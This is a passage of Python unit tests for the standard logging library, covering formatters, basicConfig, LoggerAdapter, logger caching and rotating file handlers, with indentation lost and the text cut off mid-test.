f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
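# Quick illustrative sketch of the three Formatter styles the tests above
# exercise ('%', '{' and '$'); the format strings are assumptions chosen for
# the example, not taken from the tests.
def _example_formatter_styles():
    import logging
    record = logging.makeLogRecord({'msg': 'payload', 'levelname': 'INFO'})
    percent = logging.Formatter('%(levelname)s:%(message)s')
    braces = logging.Formatter('{levelname}:{message}', style='{')
    dollars = logging.Formatter('$levelname:$message', style='$')
    assert percent.format(record) == braces.format(record) == dollars.format(record)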
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
with support.captured_stderr() as stderr:
root.debug('This should not appear')
self.assertEqual(stderr.getvalue(), '')
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), 'Final chance!\n')
# No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
with support.captured_stderr() as stderr:
root.warning('Final chance!')
msg = 'No handlers could be found for logger "root"\n'
self.assertEqual(stderr.getvalue(), msg)
# 'No handlers' message only printed once
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
# If raiseExceptions is False, no message is printed
root.manager.emittedNoHandlerWarning = False
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
finally:
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
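# Hedged sketch of the "handler of last resort" behaviour verified above: a
# logger with no handlers (and no propagation path to one) falls back to
# logging.lastResort, which writes bare messages of WARNING and above to
# sys.stderr.  The logger name is an assumption of this example.
def _example_last_resort():
    import logging
    bare = logging.getLogger('example.no.handlers')
    bare.propagate = False  # ensure no ancestor handler picks the record up
    bare.warning('goes to stderr via logging.lastResort')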
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', OSError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', OSError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', OSError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
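# Illustrative sketch (stdlib behaviour only) of what the shutdown tests above
# rely on: logging.shutdown() flushes and closes handlers in reverse order of
# creation, and the logging module registers it with atexit.
def _example_shutdown():
    import logging
    handler = logging.StreamHandler()
    logging.getLogger('example.shutdown').addHandler(handler)
    logging.shutdown()  # flush + close every handler still registered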
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
# test the default value introduced in 3.7
# (Issue #28524)
logging.disable()
self.assertEqual(logging.root.manager.disable, logging.CRITICAL)
def _test_log(self, method, level=None):
called = []
support.patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
def test_subclass_logger_cache(self):
# bpo-37258
message = []
class MyLogger(logging.getLoggerClass()):
def __init__(self, name='MyLogger', level=logging.NOTSET):
super().__init__(name, level)
message.append('initialized')
logging.setLoggerClass(MyLogger)
logger = logging.getLogger('just_some_logger')
self.assertEqual(message, ['initialized'])
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger.addHandler(h)
try:
logger.setLevel(logging.DEBUG)
logger.debug("hello")
self.assertEqual(stream.getvalue().strip(), "hello")
stream.truncate(0)
stream.seek(0)
logger.setLevel(logging.INFO)
logger.debug("hello")
self.assertEqual(stream.getvalue(), "")
finally:
logger.removeHandler(h)
h.close()
logging.setLoggerClass(logging.Logger)
@support.cpython_only # PyPy doesn't call __del__() at shutdown
@support.requires_type_collecting
def test_logging_at_shutdown(self):
# Issue #20037
code = """if 1:
import logging
class A:
def __del__(self):
try:
raise ValueError("some error")
except Exception:
logging.exception("exception in __del__")
a = A()"""
rc, out, err = assert_python_ok("-c", code)
err = err.decode()
self.assertIn("exception in __del__", err)
self.assertIn("ValueError: some error", err)
def test_recursion_error(self):
# Issue 36272
code = """if 1:
import logging
def rec():
logging.error("foo")
rec()
rec()"""
rc, out, err = assert_python_failure("-c", code)
err = err.decode()
self.assertNotIn("Cannot recover from stack overflow.", err)
self.assertEqual(rc, 1)
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
def test_multiprocessing(self):
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
try:
import multiprocessing as mp
r = logging.makeLogRecord({})
self.assertEqual(r.processName, mp.current_process().name)
except ImportError:
pass
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
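# Sketch of the opt-out switches exercised in test_optional above: setting
# these module-level flags to False makes LogRecord skip collecting thread /
# process / multiprocessing information (the fields become None).  The helper
# name is illustrative only.
def _example_record_field_switches():
    import logging
    saved = (logging.logThreads, logging.logProcesses, logging.logMultiprocessing)
    logging.logThreads = logging.logProcesses = logging.logMultiprocessing = False
    try:
        record = logging.makeLogRecord({})
        assert record.thread is None and record.process is None
    finally:
        logging.logThreads, logging.logProcesses, logging.logMultiprocessing = saved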
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.setLevel(self.original_logging_level)
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_filemode(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='foo')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, 'foo')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
# Issue 23207: test for invalid kwargs
assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
# Should pop both filename and filemode even if filename is None
logging.basicConfig(filename=None, filemode='a')
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
support.patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
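# Minimal sketch of the basicConfig() contract covered above: the first call
# installs a handler on the root logger, and later calls are no-ops while
# handlers exist (unless force=True, added in 3.8).  The level and format
# values here are illustrative assumptions.
def _example_basic_config():
    import logging
    logging.basicConfig(level=logging.INFO,
                        format='%(levelname)s:%(name)s:%(message)s')
    logging.getLogger('example.basic').info('configured via basicConfig')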
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_exception_excinfo(self):
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception('exc_info test', exc_info=exc)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
def test_nested(self):
class Adapter(logging.LoggerAdapter):
prefix = 'Adapter'
def process(self, msg, kwargs):
return f"{self.prefix} {msg}", kwargs
msg = 'Adapters can be nested, yo.'
adapter = Adapter(logger=self.logger, extra=None)
adapter_adapter = Adapter(logger=adapter, extra=None)
adapter_adapter.prefix = 'AdapterAdapter'
self.assertEqual(repr(adapter), repr(adapter_adapter))
adapter_adapter.log(logging.CRITICAL, msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, f"Adapter AdapterAdapter {msg}")
self.assertEqual(record.args, (self.recording,))
orig_manager = adapter_adapter.manager
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
temp_manager = object()
try:
adapter_adapter.manager = temp_manager
self.assertIs(adapter_adapter.manager, temp_manager)
self.assertIs(adapter.manager, temp_manager)
self.assertIs(self.logger.manager, temp_manager)
finally:
adapter_adapter.manager = orig_manager
self.assertIs(adapter_adapter.manager, orig_manager)
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
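# Hedged sketch of the LoggerAdapter pattern tested above: process() lets an
# adapter rewrite the message (and kwargs) before delegating to the wrapped
# logger, and adapters can wrap other adapters.  Class and tag names are
# assumptions of this example.
def _example_logger_adapter():
    import logging
    class PrefixAdapter(logging.LoggerAdapter):
        def process(self, msg, kwargs):
            return '[%s] %s' % (self.extra['tag'], msg), kwargs
    base = logging.getLogger('example.adapter')
    adapter = PrefixAdapter(base, {'tag': 'worker-1'})
    adapter.warning('adapters prepend context here')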
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
with support.swap_attr(logging, 'raiseExceptions', True):
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
with support.swap_attr(logging, 'raiseExceptions', False):
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
support.patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
def test_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in ('', 'root', 'foo', 'foo.bar', 'baz.bar'):
logger = logging.getLogger(name)
s = pickle.dumps(logger, proto)
unpickled = pickle.loads(s)
self.assertIs(unpickled, logger)
def test_caching(self):
root = self.root_logger
logger1 = logging.getLogger("abc")
logger2 = logging.getLogger("abc.def")
# Set root logger level and ensure cache is empty
root.setLevel(logging.ERROR)
self.assertEqual(logger2.getEffectiveLevel(), logging.ERROR)
self.assertEqual(logger2._cache, {})
# Ensure cache is populated and calls are consistent
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
self.assertFalse(logger2.isEnabledFor(logging.DEBUG))
self.assertEqual(logger2._cache, {logging.ERROR: True, logging.DEBUG: False})
self.assertEqual(root._cache, {})
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
# Ensure root cache gets populated
self.assertEqual(root._cache, {})
self.assertTrue(root.isEnabledFor(logging.ERROR))
self.assertEqual(root._cache, {logging.ERROR: True})
# Set parent logger level and ensure caches are emptied
logger1.setLevel(logging.CRITICAL)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
# Ensure logger2 uses parent logger's effective level
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
# Set level to NOTSET and ensure caches are empty
logger2.setLevel(logging.NOTSET)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Verify logger2 follows parent and not root
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
self.assertTrue(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger1.isEnabledFor(logging.ERROR))
self.assertTrue(logger1.isEnabledFor(logging.CRITICAL))
self.assertTrue(root.isEnabledFor(logging.ERROR))
# Disable logging in manager and ensure caches are clear
logging.disable()
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Ensure no loggers are enabled
self.assertFalse(logger1.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(root.isEnabledFor(logging.CRITICAL))
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
# If maxBytes is zero, rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# Check that the file is created and assume it was created by us.
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
@support.requires_zlib
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
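# Illustrative sketch (the file name and limits are assumptions) of the
# size-based rollover the tests above exercise: maxBytes triggers rotation and
# backupCount bounds how many app.log.1 ... app.log.N backups are kept.
def _example_rotating_handler(path='example-app.log'):
    import logging
    import logging.handlers
    handler = logging.handlers.RotatingFileHandler(
        path, maxBytes=1024, backupCount=3)
    logger = logging.getLogger('example.rotating')
    logger.addHandler(handler)
    logger.warning('rotates once the file exceeds maxBytes')
    handler.close()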
class TimedRotatingFileHandlerTest(BaseFileTest):
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
# print additional diagnostics
